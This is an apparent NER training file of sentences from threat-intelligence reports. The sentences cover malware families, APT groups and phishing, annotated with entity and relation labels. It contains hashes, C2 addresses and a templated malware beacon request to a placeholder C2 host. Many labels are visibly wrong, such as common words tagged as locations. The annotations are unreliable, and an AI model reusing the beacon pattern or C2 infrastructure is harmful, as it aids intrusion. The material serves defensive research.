domain.","entities":[{"id":45181,"label":"SOFTWARE","start_offset":42,"end_offset":49},{"id":45183,"label":"threat-actor","start_offset":169,"end_offset":178},{"id":45184,"label":"threat-actor","start_offset":233,"end_offset":242},{"id":45182,"label":"malware","start_offset":99,"end_offset":106}],"relations":[{"id":80,"from_id":45182,"to_id":45183,"type":"attributed-to"}],"Comments":[]} {"id":8880,"text":"Having the scheduled task run only once removes the notion of persistence.","entities":[{"id":27467,"label":"attack-pattern","start_offset":11,"end_offset":25},{"id":27468,"label":"location","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":4427,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} {"id":2246,"text":"The following alphabet is used: 3bcd1fghijklmABCDEFGH-J+LMnopq4stuvwxyzNOPQ7STUVWXYZ0e2ar56R89K\/ ","entities":[],"relations":[],"Comments":[]} {"id":9100,"text":"Stealth was already a fixture in their operations.","entities":[],"relations":[],"Comments":[]} {"id":8125,"text":"In reality, that is just an overlay screen that is displayed on top of all activity windows on the device.","entities":[{"id":25165,"label":"identity","start_offset":20,"end_offset":24}],"relations":[],"Comments":[]} {"id":1965,"text":"The DTLS protocol is used by Microsoft Windows Remote Desktop Gateway (RDG) to establish a secure channel between the RDG client and RDG server (described in detail in [MS_TSGU].pdf). The RDG client initiates the DTLS connection by sending a ClientHello to the RDG Server. The RDG server then responds with a DTLS Hello Verify Request that contains a cookie; this is used as a denial of service countermeasure.","entities":[{"id":47089,"label":"SOFTWARE","start_offset":29,"end_offset":75},{"id":47090,"label":"FILEPATH","start_offset":168,"end_offset":181}],"relations":[],"Comments":[]} {"id":4432,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} {"id":4071,"text":"HTShell supports importing additional config files.","entities":[{"id":49909,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":8147,"text":"Customized encoding routine done Relation to SideWinder","entities":[],"relations":[],"Comments":[]} {"id":7298,"text":"Third-stage payload","entities":[],"relations":[],"Comments":[]} {"id":160,"text":"Although that feature was never enabled to protect user data files like ransomware targets, there is a clear lesson from the experience: too many security checks on user activity fails in the end.","entities":[],"relations":[],"Comments":[]} {"id":5061,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":51167,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":2422,"text":" Exposing the class object to web users is very dangerous and can lead to RCE in many ways.","entities":[],"relations":[],"Comments":[]} {"id":9616,"text":"We\u2019ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[{"id":29454,"label":"tools","start_offset":70,"end_offset":76},{"id":29455,"label":"location","start_offset":77,"end_offset":80},{"id":29456,"label":"location","start_offset":81,"end_offset":89},{"id":29457,"label":"location","start_offset":112,"end_offset":115},{"id":29458,"label":"location","start_offset":143,"end_offset":146}],"relations":[],"Comments":[]} {"id":9711,"text":"Other bytes are just randomly generated noise.","entities":[{"id":29625,"label":"location","start_offset":12,"end_offset":15},{"id":29626,"label":"identity","start_offset":16,"end_offset":20}],"relations":[],"Comments":[]} {"id":5591,"text":"Avoid connecting a NAS device directly to the internet.","entities":[],"relations":[],"Comments":[]} {"id":3910,"text":"Initial access","entities":[],"relations":[],"Comments":[]} {"id":2493,"text":" Unit 42 is actively monitoring malicious traffic through our devices and cloud solutions.","entities":[{"id":45540,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":3470,"text":"Otherwise, Marade will use the C&C information embedded in its code.","entities":[{"id":49270,"label":"malware","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":5545,"text":"What can you do to stay safe?","entities":[],"relations":[],"Comments":[]} {"id":10962,"text":"To help protect users against these kinds of tracks, our Advanced Protection Program (APP) utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":33353,"label":"location","start_offset":66,"end_offset":76},{"id":33354,"label":"location","start_offset":109,"end_offset":117},{"id":33355,"label":"location","start_offset":123,"end_offset":126},{"id":33356,"label":"attack-pattern","start_offset":180,"end_offset":188},{"id":33357,"label":"location","start_offset":189,"end_offset":192}],"relations":[],"Comments":[]} {"id":3079,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":6117,"text":"It is correctly identified by eleven AV vendors as PlugX malware.","entities":[{"id":18919,"label":"malware","start_offset":51,"end_offset":56}],"relations":[],"Comments":[]} {"id":989,"text":"We would also like to thank Ryan Olson, Benjamin Small, Richar Wartell, and Chris Clark from Palo Alto networks in publishing the discovery.","entities":[{"id":46484,"label":"identity","start_offset":28,"end_offset":38},{"id":46485,"label":"identity","start_offset":40,"end_offset":54},{"id":46486,"label":"identity","start_offset":56,"end_offset":70},{"id":46487,"label":"identity","start_offset":76,"end_offset":87},{"id":46488,"label":"identity","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} {"id":10364,"text":"Given the use of lure documents designed with social engineering in mind, it is likely that the attackers use phishing or spam to target users who are unaware of these documents' malicious nature.","entities":[{"id":31553,"label":"location","start_offset":0,"end_offset":5},{"id":31554,"label":"location","start_offset":17,"end_offset":21},{"id":31555,"label":"location","start_offset":80,"end_offset":86},{"id":31556,"label":"attack-pattern","start_offset":110,"end_offset":118},{"id":31557,"label":"location","start_offset":130,"end_offset":136},{"id":31558,"label":"location","start_offset":147,"end_offset":150}],"relations":[],"Comments":[]} {"id":2130,"text":"There is also proof of concept (PoC) code available already.","entities":[],"relations":[],"Comments":[]} {"id":4367,"text":"Trend Micro\u2122 Deep Discovery\u2122 Email Inspector \u2013 Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B","entities":[{"id":50153,"label":"malware","start_offset":428,"end_offset":451},{"id":50149,"label":"SOFTWARE","start_offset":0,"end_offset":28},{"id":50150,"label":"SHA2","start_offset":271,"end_offset":335},{"id":50151,"label":"malware","start_offset":337,"end_offset":360},{"id":50152,"label":"SHA2","start_offset":362,"end_offset":426}],"relations":[{"id":920,"from_id":50150,"to_id":50151,"type":"indicates"},{"id":921,"from_id":50152,"to_id":50153,"type":"indicates"}],"Comments":[]} {"id":1314,"text":"The following icon is present in this sample: Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":6680,"text":"CISA has also issued a bulletin asking organizations using the software to follow Kaseya guidance.","entities":[],"relations":[],"Comments":[]} {"id":14180,"text":"But these efforts have been mainly targeted at Ukrainian organizations.","entities":[],"relations":[],"Comments":[]} {"id":1209,"text":"They implement code that will send SMS to pre-defined premium numbers (Figure 1).","entities":[],"relations":[],"Comments":[]} {"id":5273,"text":"For organizations, Trend Micro\u2122 Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning, as well as protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[{"id":51315,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} {"id":4521,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} {"id":14416,"text":"In these attacks, attackers utilized the Eternal Blue exploit and harvested credentials as they moved across the environment, and then used existing system tools to kill security services within machines to hide their presence.","entities":[{"id":47172,"label":"vulnerability","start_offset":41,"end_offset":61}],"relations":[],"Comments":[]} {"id":1152,"text":"These unique consistencies make it extremely improbable that two different people named these mutexes.","entities":[],"relations":[],"Comments":[]} {"id":3033,"text":"We close this list with patching because it is the most important thing you can do.","entities":[],"relations":[],"Comments":[]} {"id":14297,"text":"Infection chain of Maikspy Windows variant Figure 8.","entities":[{"id":48503,"label":"malware","start_offset":19,"end_offset":27},{"id":48504,"label":"SOFTWARE","start_offset":27,"end_offset":35}],"relations":[{"id":434,"from_id":48503,"to_id":48504,"type":"targets"}],"Comments":[]} {"id":213,"text":"In tracking this threat, early reports show that the malware has been deployed against a financial institution in Ukraine as well as two contractors in Latvia and Lithuania that provide services to the Ukrainian Government.","entities":[{"id":44633,"label":"location","start_offset":114,"end_offset":121},{"id":44634,"label":"identity","start_offset":202,"end_offset":222},{"id":44635,"label":"identity","start_offset":90,"end_offset":110},{"id":44636,"label":"location","start_offset":152,"end_offset":158},{"id":44637,"label":"location","start_offset":163,"end_offset":172},{"id":44638,"label":"malware","start_offset":53,"end_offset":60},{"id":44639,"label":"identity","start_offset":133,"end_offset":172}],"relations":[{"id":6,"from_id":44638,"to_id":44635,"type":"targets"},{"id":7,"from_id":44638,"to_id":44639,"type":"targets"}],"Comments":[]} {"id":1725,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":13383,"text":"Email: ","entities":[],"relations":[],"Comments":[]} {"id":6926,"text":"The attack vector for CVE-2019-1367 was rather atypical as the exploit was delivered from an Office document abusing the online video embedding feature to load an external URL conducting the exploitation.","entities":[{"id":21664,"label":"tools","start_offset":11,"end_offset":17},{"id":21666,"label":"location","start_offset":155,"end_offset":159}],"relations":[],"Comments":[]} {"id":6676,"text":"They used access to the VSA software to deploy ransomware associated with the REvil\/Sodinokibi ransomware-as-a-service group, according to reports.","entities":[{"id":20733,"label":"malware","start_offset":78,"end_offset":83},{"id":20734,"label":"threat-actor","start_offset":84,"end_offset":94}],"relations":[],"Comments":[]} {"id":1257,"text":"The malware was included as an attachment intended to trick the user into opening the malware.","entities":[{"id":44954,"label":"attack-pattern","start_offset":31,"end_offset":81}],"relations":[],"Comments":[]} {"id":1453,"text":" Because of this, app developers should be extremely careful about re-using certificates when signing their apps.","entities":[],"relations":[],"Comments":[]} {"id":829,"text":"As always, we recommend keeping your Microsoft products up to date with the latest patches to mitigate this vulnerability.","entities":[{"id":46379,"label":"identity","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":1266,"text":" Four of the five Sysget variants included a form of decoy document to trick users into believing they had opened a legitimate file rather than malware.","entities":[{"id":46642,"label":"malware","start_offset":18,"end_offset":24},{"id":44958,"label":"attack-pattern","start_offset":53,"end_offset":67}],"relations":[{"id":204,"from_id":46642,"to_id":44958,"type":"uses"}],"Comments":[]} {"id":1921,"text":" A malicious RTF file that exploits the CVE-2017-8750 and drops a malicious VB backdoor with C&C appswonder[.]info A malicious InPage file that exploits CVE-2017-12824 and drops two files, one non-malicious, and one malicious VB backdoor with C&C referfile[.]com Talos recently reported both C&C domain names with one type of campaign that targets iOS and involves MDM, and another type using VB and Delphi backdoors.","entities":[{"id":47039,"label":"vulnerability","start_offset":40,"end_offset":53},{"id":47042,"label":"DOMAIN","start_offset":247,"end_offset":262},{"id":47043,"label":"identity","start_offset":264,"end_offset":269},{"id":47044,"label":"SOFTWARE","start_offset":349,"end_offset":352},{"id":47045,"label":"malware","start_offset":3,"end_offset":16},{"id":47040,"label":"vulnerability","start_offset":153,"end_offset":167},{"id":47041,"label":"DOMAIN","start_offset":97,"end_offset":114}],"relations":[{"id":291,"from_id":47045,"to_id":47039,"type":"exploits"},{"id":292,"from_id":47045,"to_id":47041,"type":"communicates-with"}],"Comments":[]} {"id":9830,"text":"down_new","entities":[{"id":29966,"label":"tools","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":11642,"text":"Furthermore, it seems that these lures are distributed via phishing links.","entities":[{"id":35731,"label":"location","start_offset":39,"end_offset":42},{"id":35732,"label":"attack-pattern","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":3744,"text":"Publication of VMware advisory VMSA-2022-0014 regarding CVE-2022-22972, CVE-2022-22973.","entities":[{"id":49568,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49566,"label":"identity","start_offset":15,"end_offset":21},{"id":49567,"label":"vulnerability","start_offset":56,"end_offset":70}],"relations":[],"Comments":[]} {"id":5391,"text":"We have observed that some of the WatchGuard and Asus bots were never cleaned up because these routers still try to connect periodically to old C&Cs that were secured or taken offline.","entities":[],"relations":[],"Comments":[]} {"id":1991,"text":"We believe this was likely done to monitor the progress of the ransomware and maintain an additional foothold in compromised systems.","entities":[],"relations":[],"Comments":[]} {"id":7696,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":13428,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[],"relations":[],"Comments":[]} {"id":4515,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} {"id":9167,"text":"Coincidence?","entities":[],"relations":[],"Comments":[]} {"id":4796,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} {"id":348,"text":" The best way to protect yourself against ransomware is to keep up-to-date backups of your important files.","entities":[],"relations":[],"Comments":[]} {"id":7877,"text":"Another 156 implement a BackupAgent that restricts which data is subject to the backup.","entities":[],"relations":[],"Comments":[]} {"id":1005,"text":"2. Receiving student discounts or coupons from retailers:","entities":[],"relations":[],"Comments":[]} {"id":4577,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor\u2019s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50428,"label":"tools","start_offset":257,"end_offset":270},{"id":50424,"label":"identity","start_offset":71,"end_offset":78},{"id":50425,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":50427,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50423,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50426,"label":"identity","start_offset":136,"end_offset":175}],"relations":[{"id":969,"from_id":50423,"to_id":50425,"type":"duplicate-of"},{"id":970,"from_id":50423,"to_id":50426,"type":"impersonates"}],"Comments":[]} {"id":6391,"text":"As noted above, the sample was configured to call home to 159.65.186[.]50 on port 443.","entities":[{"id":19815,"label":"location","start_offset":20,"end_offset":26},{"id":19816,"label":"location","start_offset":45,"end_offset":49},{"id":19817,"label":"location","start_offset":50,"end_offset":54},{"id":19818,"label":"IPV4","start_offset":58,"end_offset":73}],"relations":[],"Comments":[]} {"id":5230,"text":"We named these malicious apps AnubisSpy (ANDROIDOS_ANUBISSPY) as all the malware\u2019s payload is a package called watchdog.","entities":[{"id":51263,"label":"malware","start_offset":111,"end_offset":119},{"id":51262,"label":"malware","start_offset":41,"end_offset":60},{"id":16073,"label":"malware","start_offset":30,"end_offset":39}],"relations":[{"id":1072,"from_id":51262,"to_id":16073,"type":"duplicate-of"}],"Comments":[]} {"id":4721,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[],"relations":[],"Comments":[]} {"id":3788,"text":"At the time, we found ChessMaster targeting different sectors from the academe to media and government agencies in Japan.","entities":[{"id":49628,"label":"campaign","start_offset":22,"end_offset":33},{"id":49629,"label":"identity","start_offset":71,"end_offset":111},{"id":49630,"label":"location","start_offset":115,"end_offset":120}],"relations":[{"id":851,"from_id":49628,"to_id":49629,"type":"targets"},{"id":852,"from_id":49629,"to_id":49630,"type":"located-at"}],"Comments":[]} {"id":5286,"text":"Cyclops Blink has been around since at least June 2019, and a considerable number of its C&C servers and bots are active for up to about three years.","entities":[{"id":51336,"label":"malware","start_offset":0,"end_offset":13},{"id":51337,"label":"TIME","start_offset":45,"end_offset":54}],"relations":[],"Comments":[]} {"id":13182,"text":"After the encrypted payload is loaded, the loader injects a malicious DLL into rundll32.exe.","entities":[],"relations":[],"Comments":[]} {"id":2165,"text":"This allows the attack to succeed even if the user simply views the file in the preview pane \u2013 with no clicks on the document necessary \u2013 making the attack much more dangerous.","entities":[],"relations":[],"Comments":[]} {"id":1627,"text":"This moves it to the back of the inbox there the victim is unlikely to ever see it.","entities":[],"relations":[],"Comments":[]} {"id":4472,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} {"id":11682,"text":"Analysis of the phishing pages revealed that most of them would redirect to the original webmail servers, which they copied after the victims sent out their login credentials.","entities":[{"id":35826,"label":"attack-pattern","start_offset":16,"end_offset":24},{"id":35827,"label":"location","start_offset":45,"end_offset":49},{"id":35828,"label":"location","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} {"id":1318,"text":"More information on its history is available at the following links.","entities":[],"relations":[],"Comments":[]} {"id":6417,"text":"This impersonation does not imply a vulnerability in Microsoft\u2019s products or services. Brute Ratel C4 ISO Samples: 1FC7B0E1054D54CE8F1DE0CC95976081C7A85C7926C03172A3DDAA672690042C X64 Brute Ratel C4 Windows Kernel Module: 31ACF37D180AB9AFBCF6A4EC5D29C3E19C947641A2D9CE3CE56D71C1F576C069 APT29 ISO Samples: F58AE9193802E9BAF17E6B59E3FDBE3E9319C5D27726D60802E3E82D30D14D46 ","entities":[{"id":19912,"label":"SHA2","start_offset":117,"end_offset":181},{"id":19914,"label":"SHA2","start_offset":226,"end_offset":290},{"id":19915,"label":"threat-actor","start_offset":292,"end_offset":297},{"id":19916,"label":"SHA2","start_offset":312,"end_offset":376}],"relations":[],"Comments":[]} {"id":1002,"text":"By using this kind of account, a user can perform a developer unlock on their Windows Phone devices without incurring a fee.","entities":[],"relations":[],"Comments":[]} {"id":2024,"text":" We have observed two different samples of the HelloXD ransomware publicly available, indicating it is still under development by the author(s).","entities":[{"id":6000,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} {"id":949,"text":"Taomike has not previously been associated with malicious activity, but a recent update to their software added SMS theft functionality.","entities":[{"id":46458,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":3074,"text":"In March of 2014, a Fake AV app named \u201cVirus Shield\u201d was listed for sale at $3.99 and quickly rose to the top position of Google Play\u2019s New Paid Apps list.","entities":[{"id":48141,"label":"malware","start_offset":39,"end_offset":51},{"id":48142,"label":"SOFTWARE","start_offset":122,"end_offset":134},{"id":48143,"label":"TIME","start_offset":3,"end_offset":16}],"relations":[],"Comments":[]} {"id":14233,"text":"Among them is an algorithm utilized by PlugX.","entities":[{"id":48419,"label":"malware","start_offset":39,"end_offset":44}],"relations":[],"Comments":[]} {"id":4837,"text":"Both, however, enable attacks by those who would otherwise lack the capabilities to do so.","entities":[],"relations":[],"Comments":[]} {"id":11965,"text":"We received leads from Graphika that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} {"id":13747,"text":"During our investigation, we noticed that the value \"OracleOciLib\" was deleted from the victim's machine, as shown in Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":1565,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":164,"text":"It goes after the files users are most likely to care about.","entities":[],"relations":[],"Comments":[]} {"id":4481,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":2853,"text":"You can find more information on this tool here.","entities":[],"relations":[],"Comments":[]} {"id":4709,"text":"And we don\u2019t just plug security holes \u2013 we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4464,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups\u2019s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50250,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50251,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50248,"label":"TIME","start_offset":3,"end_offset":7},{"id":50249,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50252,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} {"id":2514,"text":" Conti also stands out as unreliable.","entities":[{"id":45557,"label":"threat-actor","start_offset":1,"end_offset":6}],"relations":[],"Comments":[]} {"id":3882,"text":"A more detailed analysis of the Command-and-Control communication flow of ANEL can be found in this technical brief.","entities":[{"id":49738,"label":"malware","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} {"id":11144,"text":"We terminated 8 YouTube channels as part of our actions against a coordinated influence operation linked to Yemen.","entities":[],"relations":[],"Comments":[]} {"id":8111,"text":"The malware retrieves a specific exploit from the C&C server depending on the DEX downloaded by the dropper.","entities":[],"relations":[],"Comments":[]} {"id":4080,"text":"Upload file 2 Download file","entities":[],"relations":[],"Comments":[]} {"id":14387,"text":"Mark Nunnikhoven does a great job in this post talking about lateral movement.","entities":[{"id":51801,"label":"identity","start_offset":0,"end_offset":16},{"id":51802,"label":"attack-pattern","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} {"id":1434,"text":", soon attackers and malware authors will turn their attention to exploiting vulnerabilities surrounding Android app certificates.","entities":[{"id":46766,"label":"SOFTWARE","start_offset":105,"end_offset":116}],"relations":[],"Comments":[]} {"id":1137,"text":"But because the mutex name is set at compile time, the mutex itself offers a common thread between all of the samples we collected and analyzed.","entities":[],"relations":[],"Comments":[]} {"id":4966,"text":"To protect our users, Google\u2019s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[{"id":51011,"label":"identity","start_offset":22,"end_offset":58}],"relations":[],"Comments":[]} {"id":3839,"text":"At that time, ChessMaster was using ANEL as a backdoor into the target system then injects code into svchost.exe, which then decrypts and activates the embedded backdoor.","entities":[{"id":49694,"label":"malware","start_offset":14,"end_offset":25},{"id":49695,"label":"malware","start_offset":36,"end_offset":40},{"id":49696,"label":"FILEPATH","start_offset":101,"end_offset":112}],"relations":[],"Comments":[]} {"id":4849,"text":"Since 2012, TAG has been tracking an interwoven set of Indian hack-for-hire actors, with many having previously worked for Indian offensive security providers Appin and Belltrox.","entities":[{"id":50814,"label":"TIME","start_offset":6,"end_offset":10},{"id":50815,"label":"location","start_offset":55,"end_offset":61},{"id":50816,"label":"attack-pattern","start_offset":62,"end_offset":75},{"id":50817,"label":"location","start_offset":123,"end_offset":129},{"id":50818,"label":"identity","start_offset":159,"end_offset":164},{"id":50819,"label":"identity","start_offset":169,"end_offset":177}],"relations":[],"Comments":[]} {"id":12150,"text":"We did not recover additional payloads in our environment.","entities":[],"relations":[],"Comments":[]} {"id":868,"text":"In early 2015, Emnisoft identified a new family of malware named PClock.","entities":[{"id":46402,"label":"identity","start_offset":15,"end_offset":23},{"id":46405,"label":"TIME","start_offset":3,"end_offset":13},{"id":46403,"label":"malware","start_offset":65,"end_offset":71}],"relations":[],"Comments":[]} {"id":3152,"text":"According to recent Trend Micro research, many global organizations are already struggling to securely manage their cloud assets.","entities":[{"id":48270,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} {"id":3833,"text":"Base64 encoded ANEL downloaded by Koadic ANEL will send the infected environment\u2019s information to the C&C server.","entities":[{"id":49689,"label":"malware","start_offset":15,"end_offset":19},{"id":49690,"label":"malware","start_offset":34,"end_offset":40},{"id":49691,"label":"malware","start_offset":41,"end_offset":45},{"id":49692,"label":"Infrastucture","start_offset":102,"end_offset":112}],"relations":[{"id":860,"from_id":49690,"to_id":49689,"type":"downloads"},{"id":861,"from_id":49691,"to_id":49692,"type":"exfiltrates-to"}],"Comments":[]} {"id":1640,"text":" In total we\u2019ve found 18 different applications in the Google Play store that contain the Funtasy Trojan.","entities":[{"id":46863,"label":"malware","start_offset":90,"end_offset":97},{"id":46864,"label":"SOFTWARE","start_offset":55,"end_offset":66}],"relations":[{"id":242,"from_id":46864,"to_id":46863,"type":"hosts"}],"Comments":[]} {"id":6992,"text":" Figure 18. CapraRAT APK file drops an mp4 file The RAT also has a persistence mechanism that always keeps the app active.","entities":[{"id":21897,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":4762,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} {"id":9752,"text":"The PowerShell code has several layers of obfuscation.","entities":[{"id":29739,"label":"attack-pattern","start_offset":4,"end_offset":14}],"relations":[],"Comments":[]} {"id":9320,"text":" Group Encryption Algorithm JavaScript Library Magecart Group 11 AES Gibberish-AES ReactGet RSA JSEncrypt Mirrorthief AES Crypto-JS Table 2. Comparison of encryption algorithms used by the different groups","entities":[{"id":28757,"label":"location","start_offset":39,"end_offset":46},{"id":28758,"label":"malware","start_offset":47,"end_offset":55},{"id":28759,"label":"malware","start_offset":69,"end_offset":78},{"id":28760,"label":"identity","start_offset":92,"end_offset":95}],"relations":[],"Comments":[]} {"id":1147,"text":"However, and lucky for us, the malware author was arrested in 2010 so several of the hypothesis can be verified.","entities":[{"id":46573,"label":"TIME","start_offset":62,"end_offset":66}],"relations":[],"Comments":[]} {"id":3133,"text":"When devices (in this case, the routers) are under someone else\u2019s control like this, the collection is referred to as a \u201cbotnet\u201d, a network (-net) of remotely controlled systems or devices (bot-).","entities":[],"relations":[],"Comments":[]} {"id":9695,"text":" The final 5-byte sequence looks like F3 00 00 00 92 0D.","entities":[],"relations":[],"Comments":[]} {"id":4127,"text":"In our investigation, we also found a suspicious executable named telegram.exe.","entities":[{"id":49926,"label":"FILEPATH","start_offset":66,"end_offset":78}],"relations":[],"Comments":[]} {"id":986,"text":"When developers incorporate the libraries into their apps they need to carefully test them and monitor for any abnormal activities.","entities":[],"relations":[],"Comments":[]} {"id":14292,"text":"The spyware displays the online dating scam website upon the installation of the malicious Virtual Girlfriend app What will be shown is the registration page of an online dating site, which will lure users into giving out their credit card information.","entities":[],"relations":[],"Comments":[]} {"id":9849,"text":"Figure 13. Avenger2 with internal URL Casper Casper is a modified version of the Cobalt Strike backdoor, showing the team server SHA1 hash if the controller connects to the C&C.","entities":[],"relations":[],"Comments":[]} {"id":1465,"text":"The most famous set of key pairs would be the key pairs included within the AOSP source files (in Table 1, below). ","entities":[{"id":46774,"label":"SOFTWARE","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} {"id":10244,"text":"We think that Pawn Storm compromises lots of email accounts through brute force attacks on internet-facing services like email, LDAP, Microsoft Autodiscover, SMB, and SQL.","entities":[{"id":31294,"label":"threat-actor","start_offset":14,"end_offset":24},{"id":31295,"label":"attack-pattern","start_offset":68,"end_offset":79},{"id":31297,"label":"location","start_offset":163,"end_offset":166}],"relations":[],"Comments":[]} {"id":3737,"text":" 2022-04-06:","entities":[{"id":49549,"label":"TIME","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} {"id":4787,"text":"The U.S. should also consider ways to foster greater transparency in the marketplace, including setting heightened transparency requirements for the domestic surveillance industry.","entities":[{"id":50687,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":14407,"text":"These activities may be difficult to identify for defenders due to the use of these things like: PSEXEC to execute a program from remote system Schedule a remote task to execute back door or malicious code RDP or net use to connect to other hosts","entities":[{"id":47165,"label":"SOFTWARE","start_offset":210,"end_offset":214},{"id":44527,"label":"malware","start_offset":101,"end_offset":107}],"relations":[],"Comments":[]} {"id":2101,"text":"Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":5092,"text":"The kit initially serves some heavily obfuscated javascript used to fingerprint the target system.","entities":[],"relations":[],"Comments":[]} {"id":1539,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3718,"text":"Command and Control","entities":[],"relations":[],"Comments":[]} {"id":1659,"text":"The producer of the NetWire WorldWiredLabs, states that the tool uses 256-bit AES encryption, which we found to be accurate.","entities":[{"id":45091,"label":"malware","start_offset":20,"end_offset":42}],"relations":[],"Comments":[]} {"id":968,"text":"SMS information collected by the receiver is saved in a hashmap with \u201cother\u201d as the key and sent to a method that uploads the message to 112.126.69.51 as shown in Figure 4.","entities":[{"id":3036,"label":"IPV4","start_offset":137,"end_offset":150}],"relations":[],"Comments":[]} {"id":1034,"text":"However, identity theft is a global concern and the Chinese citizen ID is no exception, allowing for potential sellers to simply purchase a usable identity online.","entities":[{"id":46528,"label":"attack-pattern","start_offset":8,"end_offset":23}],"relations":[],"Comments":[]} {"id":4016,"text":"In July 2020, we noticed interesting activity coming from the group, and we have been closely monitoring it since.","entities":[{"id":49867,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":13648,"text":"While their phishing tools are basic (i.e., no backdoors, trojans, and other malware), they made use of public cloud services to conduct their operations.","entities":[{"id":51735,"label":"attack-pattern","start_offset":12,"end_offset":20},{"id":51736,"label":"Infrastucture","start_offset":104,"end_offset":125}],"relations":[],"Comments":[]} {"id":14378,"text":"On the other end are places like some large banking and R&D companies that can manage about 98 or 99%.","entities":[],"relations":[],"Comments":[]} {"id":5130,"text":"We talk about north\/south traffic with the network, which is basically inside the network to outside of the network, so out to the the internet and back.","entities":[],"relations":[],"Comments":[]} {"id":8196,"text":" We investigated the name shown on the account but did not find any useful information other than the fact that this name is used mostly in the Ivory Coast in Africa.","entities":[],"relations":[],"Comments":[]} {"id":4402,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":13184,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} {"id":3098,"text":" Until then, the makers of operating systems can (and have) released patches that make the physical-layer vulnerabilities inaccessible.","entities":[],"relations":[],"Comments":[]} {"id":7672,"text":"Trend Micro\u2122 Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the 